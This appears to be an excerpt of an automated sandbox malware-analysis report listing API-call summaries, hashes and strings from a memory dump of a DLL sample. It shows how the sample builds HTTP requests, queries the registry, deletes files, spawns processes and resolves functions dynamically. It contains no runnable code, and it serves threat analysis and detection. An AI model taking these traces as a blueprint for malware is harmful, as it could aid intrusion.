                • lstrlen.KERNEL32(00000000,?,046EE218), ref: 046D9B85
                • memmove.NTDLL(046EE17D,?,00000001,?,046EE218), ref: 046D9B95
                • lstrlen.KERNEL32(?,00000000,?,046EE17C,?,?,046EE218), ref: 046D9BC1
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D9BE7
                • memcpy.NTDLL(00000000,?,?,?,046EE218), ref: 046D9BFB
                • memcpy.NTDLL(046EE17C,?,?,?,046EE218), ref: 046D9C1B
                • HeapFree.KERNEL32(00000000,046EE17C,?,?,?,?,?,?,?,?,046EE218), ref: 046D9C57
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 046D9D1D
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 046D9D65
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                • String ID: GET $GET $OPTI$OPTI$POST$PUT
                • API String ID: 3227826163-647159250
                • Opcode ID: 0d356815e2cec2e8add8506762f5fe930646ee77c7fb14ce990deb33c483ade7
                • Instruction ID: c4a4a80ec956b3208d8ce2cd30b9b3296e51e065a1b6fa4c059c6631cc5ccab1
                • Opcode Fuzzy Hash: 0d356815e2cec2e8add8506762f5fe930646ee77c7fb14ce990deb33c483ade7
                • Instruction Fuzzy Hash: 8BE169B1E00205EFDB14DFA9C884BAE7BB9FF04304F048559E915EB260E731E955DB90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL ref: 046C8035
                • wsprintfA.USER32 ref: 046C809F
                • wsprintfA.USER32 ref: 046C80E5
                • wsprintfA.USER32 ref: 046C8106
                • lstrcat.KERNEL32(00000000,?), ref: 046C813D
                • wsprintfA.USER32 ref: 046C815E
                • HeapFree.KERNEL32(00000000,00000000), ref: 046C8178
                • wsprintfA.USER32 ref: 046C819F
                • HeapFree.KERNEL32(00000000,?), ref: 046C81B4
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 046C81CE
                • RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046C81EF
                • RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046C8209
                  • Part of subcall function 046C64A2: lstrlen.KERNEL32(00000000,7691C740,?,00000000,74E481D0,?,?,046D09CA,00000000,04C9C0E0), ref: 046C64CD
                  • Part of subcall function 046C64A2: lstrlen.KERNEL32(?,?,?,046D09CA,00000000,04C9C0E0), ref: 046C64D5
                  • Part of subcall function 046C64A2: strcpy.NTDLL ref: 046C64EC
                  • Part of subcall function 046C64A2: lstrcat.KERNEL32(00000000,?), ref: 046C64F7
                  • Part of subcall function 046C64A2: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046D09CA,00000000,04C9C0E0), ref: 046C6514
                • StrTrimA.SHLWAPI(00000000,046E83F8,00000000,04C9C0E0), ref: 046C823E
                  • Part of subcall function 046CD27A: lstrlen.KERNEL32(04C9CF38,00000000,00000000,74E481D0,046D09F9,00000000), ref: 046CD28A
                  • Part of subcall function 046CD27A: lstrlen.KERNEL32(?), ref: 046CD292
                  • Part of subcall function 046CD27A: lstrcpy.KERNEL32(00000000,04C9CF38), ref: 046CD2A6
                  • Part of subcall function 046CD27A: lstrcat.KERNEL32(00000000,?), ref: 046CD2B1
                • lstrcpy.KERNEL32(?,?), ref: 046C8267
                • lstrcpy.KERNEL32(00000000,00000000), ref: 046C8271
                • lstrcat.KERNEL32(00000000,?), ref: 046C827C
                • lstrcat.KERNEL32(00000000,?), ref: 046C8283
                • RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046C828E
                • RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046C82AA
                  • Part of subcall function 046E4C0C: memcpy.NTDLL(?,?,00000010,?,00000110,?), ref: 046E4C5D
                  • Part of subcall function 046E4C0C: memcpy.NTDLL(00000000,?,?,0000011F,?,00000110,?), ref: 046E4CF0
                • HeapFree.KERNEL32(00000000,?,00000001,04C9C0E0,?,?,?), ref: 046C8371
                • HeapFree.KERNEL32(00000000,?,?), ref: 046C8389
                • HeapFree.KERNEL32(00000000,?,00000000,04C9C0E0), ref: 046C8397
                • HeapFree.KERNEL32(00000000,00000000), ref: 046C83A5
                • HeapFree.KERNEL32(00000000,00000000), ref: 046C83B0
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                • String ID:
                • API String ID: 4032678529-0
                • Opcode ID: 5a2b5f1568f574c83181d6c0ad360ed0bfbe55b6cc7b8f9d84af0c61b110df5a
                • Instruction ID: bde170d09b4c093828c9f6b8d2607ba5e333e6f01d7ce906584da527e3ed0975
                • Opcode Fuzzy Hash: 5a2b5f1568f574c83181d6c0ad360ed0bfbe55b6cc7b8f9d84af0c61b110df5a
                • Instruction Fuzzy Hash: 7BB13671604306EFD711EFAADC44E2A77E9EB88304F055429F548DB261E73AEC158F61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetLastError.KERNEL32 ref: 046D2940
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D295C
                • GetLastError.KERNEL32 ref: 046D29AB
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D29C1
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D29D5
                • GetLastError.KERNEL32 ref: 046D29EF
                • GetLastError.KERNEL32 ref: 046D2A22
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D2A40
                • lstrlenW.KERNEL32(00000000,?), ref: 046D2A6C
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D2A81
                • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 046D2B55
                • HeapFree.KERNEL32(00000000,?), ref: 046D2B64
                • WaitForSingleObject.KERNEL32(00000000), ref: 046D2B79
                • HeapFree.KERNEL32(00000000,00000000), ref: 046D2B8C
                • HeapFree.KERNEL32(00000000,?), ref: 046D2B9E
                • RtlExitUserThread.NTDLL(?,?), ref: 046D2BB3
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                • String ID:
                • API String ID: 3853681310-3916222277
                • Opcode ID: 6524ac25f875e376535539852d14c8c37b296d561a072a91151954dcdc49846d
                • Instruction ID: a14788d505da8e24f91564ea026fe77ecfb01a86fc05d7051332ea4063421d60
                • Opcode Fuzzy Hash: 6524ac25f875e376535539852d14c8c37b296d561a072a91151954dcdc49846d
                • Instruction Fuzzy Hash: 91812B7190020AEFDB10DFA6DD88EAE7BF8FB48704B0450A9F505AB250F779AD45DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046CBC31: RegQueryValueExA.KERNELBASE(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,00000003,00000000,?,00000000,?,046DE5BD,046DE5BD,?,046D6019,00000000), ref: 046CBC69
                  • Part of subcall function 046CBC31: RtlAllocateHeap.NTDLL(00000000,046D6019), ref: 046CBC7D
                  • Part of subcall function 046CBC31: RegQueryValueExA.ADVAPI32(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046CBC97
                  • Part of subcall function 046CBC31: RegCloseKey.ADVAPI32(?,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046CBCC1
                • HeapFree.KERNEL32(00000000,?,?,?,046C158F,74E5F710,00000000,00000000), ref: 046D7E24
                • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 046D7E42
                • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?,?,?,?,?,?,046C158F), ref: 046D7E6E
                • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,?,00000000,?,?,046C158F), ref: 046D7EDC
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 046D7F54
                • wsprintfA.USER32 ref: 046D7F70
                • lstrlen.KERNEL32(00000000,00000000), ref: 046D7F7B
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 046D7F92
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 046D801E
                • wsprintfA.USER32 ref: 046D8039
                • lstrlen.KERNEL32(00000000,00000000), ref: 046D8044
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 046D805B
                • HeapFree.KERNEL32(00000000,046C158F,?,?,00000008,0000000B,?,046C158F,046C158F,00000001,?,00000000,?,?,046C158F), ref: 046D807D
                • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 046D8098
                • wsprintfA.USER32 ref: 046D80AF
                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,046C158F), ref: 046D80BA
                  • Part of subcall function 046CB823: lstrlen.KERNEL32(046C1127,?,00000000,00000000,046C2C06,00000011,046C1127,00000001,00000000,?,-00000008,?,046C1127,00000000,?,?), ref: 046CB853
                  • Part of subcall function 046CB823: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 046CB869
                  • Part of subcall function 046CB823: memcpy.NTDLL(00000010,?,00000000), ref: 046CB89F
                  • Part of subcall function 046CB823: memcpy.NTDLL(00000010,00000000,?), ref: 046CB8BA
                  • Part of subcall function 046CB823: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 046CB8D8
                  • Part of subcall function 046CB823: GetLastError.KERNEL32 ref: 046CB8E2
                  • Part of subcall function 046CB823: HeapFree.KERNEL32(00000000,00000000), ref: 046CB905
                • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,046C158F), ref: 046D80D1
                • HeapFree.KERNEL32(00000000,?,0000001D,00000008,?,04C98A20,?,?,?,?,?,?,?,?,?,046C158F), ref: 046D80FD
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                • String ID:
                • API String ID: 3130754786-0
                • Opcode ID: cfc8a99a980d6f46a13868fd6819b2e54e71788f78dba28cd6c287f0f0b341c0
                • Instruction ID: f8b7fc174a4f60a3bea0b23e7f23ad73b36b2e083cfd1066f172d006a615f9e4
                • Opcode Fuzzy Hash: cfc8a99a980d6f46a13868fd6819b2e54e71788f78dba28cd6c287f0f0b341c0
                • Instruction Fuzzy Hash: 89A15CB1D00209EFEB20EF96DC88DAEBBB9FB48305B004429E515A7250F7356E55DF61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlenW.KERNEL32(?), ref: 046DC467
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 046DD3E9
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046DD3F5
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD43D
                  • Part of subcall function 046DD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD458
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(0000002C), ref: 046DD490
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(?), ref: 046DD498
                  • Part of subcall function 046DD39D: memset.NTDLL ref: 046DD4BB
                  • Part of subcall function 046DD39D: wcscpy.NTDLL ref: 046DD4CD
                  • Part of subcall function 046DD39D: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 046DD4F3
                  • Part of subcall function 046DD39D: RtlEnterCriticalSection.NTDLL(?), ref: 046DD528
                  • Part of subcall function 046DD39D: RtlLeaveCriticalSection.NTDLL(?), ref: 046DD544
                  • Part of subcall function 046DD39D: FindNextFileW.KERNEL32(?,00000000), ref: 046DD55D
                  • Part of subcall function 046DD39D: WaitForSingleObject.KERNEL32(00000000), ref: 046DD56F
                  • Part of subcall function 046DD39D: FindClose.KERNEL32(?), ref: 046DD584
                  • Part of subcall function 046DD39D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD598
                  • Part of subcall function 046DD39D: lstrlenW.KERNEL32(0000002C), ref: 046DD5BA
                • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 046DC4C3
                • memcpy.NTDLL(00000000,?,00000000), ref: 046DC4D6
                • lstrcpyW.KERNEL32(00000000,?), ref: 046DC4ED
                  • Part of subcall function 046DD39D: FindNextFileW.KERNEL32(?,00000000), ref: 046DD630
                  • Part of subcall function 046DD39D: WaitForSingleObject.KERNEL32(00000000), ref: 046DD642
                  • Part of subcall function 046DD39D: FindClose.KERNEL32(?), ref: 046DD65D
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 046DC518
                • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 046DC530
                • HeapFree.KERNEL32(00000000,00000000), ref: 046DC58A
                • lstrlenW.KERNEL32(00000000,?), ref: 046DC5AD
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046DC5BF
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 046DC633
                • HeapFree.KERNEL32(00000000,?), ref: 046DC643
                  • Part of subcall function 046C1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,046DDB18,?,?,00000000,046CC692,?,?,?,?,00000000,?), ref: 046C1B99
                  • Part of subcall function 046C1B8A: mbstowcs.NTDLL ref: 046C1BB5
                • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 046DC66C
                • lstrlenW.KERNEL32(046EF878,?), ref: 046DC6E6
                • DeleteFileW.KERNEL32(?,?), ref: 046DC714
                • HeapFree.KERNEL32(00000000,?), ref: 046DC722
                • HeapFree.KERNEL32(00000000,?), ref: 046DC743
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                • String ID:
                • API String ID: 72361108-0
                • Opcode ID: 9b36dbe49154262596f0aa8d28af22201e0876b7b4c08bce790c28616013f2b3
                • Instruction ID: be22460fb1c71b73fd09487a8bea87f1686be3f8f78a06c8cee8171791f9b37c
                • Opcode Fuzzy Hash: 9b36dbe49154262596f0aa8d28af22201e0876b7b4c08bce790c28616013f2b3
                • Instruction Fuzzy Hash: B3914571A0121ABFDB10DFA6DC88DAA3BFCEB49340B045465F509DB211F735AA45CB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 046DEF49
                • RtlEnterCriticalSection.NTDLL(00000000), ref: 046DEF66
                • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 046DEFB6
                • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 046DEFC0
                • GetLastError.KERNEL32 ref: 046DEFCA
                • HeapFree.KERNEL32(00000000,00000000), ref: 046DEFDB
                • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 046DEFFD
                • HeapFree.KERNEL32(00000000,?), ref: 046DF034
                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 046DF048
                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 046DF051
                • SuspendThread.KERNEL32(?), ref: 046DF060
                • CreateEventA.KERNEL32(046EE268,00000001,00000000), ref: 046DF074
                • SetEvent.KERNEL32(00000000), ref: 046DF081
                • CloseHandle.KERNEL32(00000000), ref: 046DF088
                • Sleep.KERNEL32(000001F4), ref: 046DF09B
                • ResumeThread.KERNEL32(?), ref: 046DF0BF
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                • String ID:
                • API String ID: 1011176505-0
                • Opcode ID: 16d6c0ab3188e8729f8e4962be2180ecae9c036bfbf7e573187453dce2592fc0
                • Instruction ID: fd7b0973d9709e0d33c04775f84b874b18a1ebe9cbdb6735e81ca5e412d8db17
                • Opcode Fuzzy Hash: 16d6c0ab3188e8729f8e4962be2180ecae9c036bfbf7e573187453dce2592fc0
                • Instruction Fuzzy Hash: E4415072900509EFDB10AFA6DC889ADBBF9FB14304B145069F601EB210F7366D91DB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • memset.NTDLL ref: 046C7CD6
                • StrChrA.SHLWAPI(?,0000000D), ref: 046C7D1C
                • StrChrA.SHLWAPI(?,0000000A), ref: 046C7D29
                • StrChrA.SHLWAPI(?,0000007C), ref: 046C7D50
                • StrTrimA.SHLWAPI(?,046EA4A4), ref: 046C7D65
                • StrChrA.SHLWAPI(?,0000003D), ref: 046C7D6E
                • StrTrimA.SHLWAPI(00000001,046EA4A4), ref: 046C7D84
                • _strupr.NTDLL ref: 046C7D8B
                • StrTrimA.SHLWAPI(?,?), ref: 046C7D98
                • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 046C7DE0
                • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,00000000,?,?,046C158F), ref: 046C7DFF
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                • String ID: $;
                • API String ID: 4019332941-73438061
                • Opcode ID: 51e969bb6141eda0c64b37a49209c9911c3113a5be5b51acae653b508458be4b
                • Instruction ID: d43bbbea4b4faad4b80d051f96fef79cb3447de73904b39500fb99b80b5955cd
                • Opcode Fuzzy Hash: 51e969bb6141eda0c64b37a49209c9911c3113a5be5b51acae653b508458be4b
                • Instruction Fuzzy Hash: BA418F726043069FD321AF698C44B3ABBE9EB58701F04081EF9959B251FB74F9058BA6
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 046E2BF2
                  • Part of subcall function 046C1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,046DDB18,?,?,00000000,046CC692,?,?,?,?,00000000,?), ref: 046C1B99
                  • Part of subcall function 046C1B8A: mbstowcs.NTDLL ref: 046C1BB5
                • lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 046E2C2B
                • wcstombs.NTDLL ref: 046E2C35
                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 046E2C66
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,046DFD2F), ref: 046E2C92
                • TerminateProcess.KERNEL32(?,000003E5), ref: 046E2CA8
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,046DFD2F), ref: 046E2CBC
                • GetLastError.KERNEL32 ref: 046E2CC0
                • GetExitCodeProcess.KERNEL32(?,00000001), ref: 046E2CE0
                • CloseHandle.KERNEL32(?), ref: 046E2CEF
                • CloseHandle.KERNEL32(?), ref: 046E2CF4
                • GetLastError.KERNEL32 ref: 046E2CF8
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                • String ID: D
                • API String ID: 2463014471-2746444292
                • Opcode ID: 5cec57648281fb5fd273792b6597c9fe2f142a64ba448eacf93363301848cd70
                • Instruction ID: 6a8eba1053d3fad7fc162f87bab6e90d4e460639eaf215d70eb6a9dcac87c97c
                • Opcode Fuzzy Hash: 5cec57648281fb5fd273792b6597c9fe2f142a64ba448eacf93363301848cd70
                • Instruction Fuzzy Hash: 7D4148B5901118FFEB11EFA6CD859FEBBFDEB08644F20406AE501B7250F675AE018B60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • StrChrA.SHLWAPI(046C158F,0000002C,00000000,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000,0000000B,?), ref: 046C76F3
                • StrTrimA.SHLWAPI(00000001,?,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000,0000000B,?,046C158F), ref: 046C770C
                • StrChrA.SHLWAPI(046C158F,0000002C,00000000,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000,0000000B,?), ref: 046C7717
                • StrTrimA.SHLWAPI(00000001,?,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000,0000000B,?,046C158F), ref: 046C7730
                • lstrlen.KERNEL32(00000000,00000001,?,?,00000000,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000), ref: 046C77C8
                • RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 046C77EA
                • lstrcpy.KERNEL32(00000020,?), ref: 046C7809
                • lstrlen.KERNEL32(?,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000,0000000B,?,046C158F,046C158F), ref: 046C7813
                • memcpy.NTDLL(?,?,?,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000,0000000B,?), ref: 046C7854
                • memcpy.NTDLL(?,?,?,?,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F,00000000,0000000B), ref: 046C7867
                • SwitchToThread.KERNEL32(00000057,00000000,?,0000001E,?,?,?,?,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057), ref: 046C788B
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000001E,?,?,?,?,?,00000000,046DC9ED,?,00000000,0000001E), ref: 046C78AA
                • HeapFree.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F), ref: 046C78D0
                • HeapFree.KERNEL32(00000000,00000001,00000001,?,?,00000000,?,00000000,046DC9ED,?,00000000,0000001E,00000001,00000057,046C159F,046C158F), ref: 046C78EC
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                • String ID:
                • API String ID: 3323474148-0
                • Opcode ID: 96389755c507815640a7f91a615cf4287e3b72a81bfa1e9f68c130c4371056b1
                • Instruction ID: 8836f917793c55573155b213a576ce47d2caa8f839c2ace37043d34e7f2e9699
                • Opcode Fuzzy Hash: 96389755c507815640a7f91a615cf4287e3b72a81bfa1e9f68c130c4371056b1
                • Instruction Fuzzy Hash: 34716532508306AFD721DF25C844A6ABBE8FB88315F04492EF59997250F735EA45CFA2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(?,?,00000000), ref: 046C9DB7
                • lstrlen.KERNEL32(?,?,00000000), ref: 046C9DBE
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046C9DD5
                • lstrcpy.KERNEL32(00000000,?), ref: 046C9DE6
                • lstrcat.KERNEL32(?,?), ref: 046C9E02
                • lstrcat.KERNEL32(?,?), ref: 046C9E13
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046C9E24
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046C9EC1
                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 046C9EFA
                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 046C9F13
                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 046C9F1D
                • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 046C9F2D
                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 046C9F46
                • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 046C9F56
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                • String ID:
                • API String ID: 333890978-0
                • Opcode ID: 711e5d196ca48111630e8cd5f09c4b9f1b9781990a83b2567ff296a0c89430f4
                • Instruction ID: d4614ec8460da878dbee77b318be19829623bc7bb46fb98b64c224b680f072e5
                • Opcode Fuzzy Hash: 711e5d196ca48111630e8cd5f09c4b9f1b9781990a83b2567ff296a0c89430f4
                • Instruction Fuzzy Hash: C8517AB6800209FFDB11AFA5DC84CAE7BBDFB48344B049069F6159B210E7759E49DF60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • wsprintfA.USER32 ref: 046DC23D
                • OpenWaitableTimerA.KERNEL32(00100000,00000000,046D5DB1), ref: 046DC250
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,046D5DB1,00000000,?), ref: 046DC368
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • memset.NTDLL ref: 046DC273
                • memcpy.NTDLL(?,000493E0,00000010,?,?,00000040,?,?,?,?,?,?,046D5DB1,00000000,?), ref: 046DC2F2
                • RtlEnterCriticalSection.NTDLL(?), ref: 046DC307
                • RtlLeaveCriticalSection.NTDLL(?), ref: 046DC31F
                • GetLastError.KERNEL32(046D842E,?,?,?,?,?,?,?,00000040,?,?,?,?,?,?,046D5DB1), ref: 046DC337
                • RtlEnterCriticalSection.NTDLL(?), ref: 046DC343
                • RtlLeaveCriticalSection.NTDLL(?), ref: 046DC352
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
                • String ID: 0x%08X$W
                • API String ID: 1559661116-2600449260
                • Opcode ID: f8695894a6c9354806f5ab30a3a6086f881b7e164ee84068098aa8fdd80e5826
                • Instruction ID: 81ad2dfa983960ede8ae40326eb1f07edc858b223d470db9ae18f9a50e6261ec
                • Opcode Fuzzy Hash: f8695894a6c9354806f5ab30a3a6086f881b7e164ee84068098aa8fdd80e5826
                • Instruction Fuzzy Hash: 7F414DB1900709EFDB20DFA5C848AAEBBF8FF08754F108529E549D7280E375AA54CB94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlenW.KERNEL32(?,00000000,?,?,?,046CB20B,?,?), ref: 046CD96B
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,046CB20B,?,?), ref: 046CD994
                • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 046CD9B4
                • lstrcpyW.KERNEL32(-00000002,?), ref: 046CD9CF
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,046CB20B,?,?), ref: 046CD9DB
                • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,046CB20B,?,?), ref: 046CD9DE
                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,046CB20B,?,?), ref: 046CD9EA
                • GetProcAddress.KERNEL32(00000000,?), ref: 046CDA07
                • GetProcAddress.KERNEL32(00000000,?), ref: 046CDA21
                • GetProcAddress.KERNEL32(00000000,?), ref: 046CDA37
                • GetProcAddress.KERNEL32(00000000,?), ref: 046CDA4D
                • GetProcAddress.KERNEL32(00000000,?), ref: 046CDA63
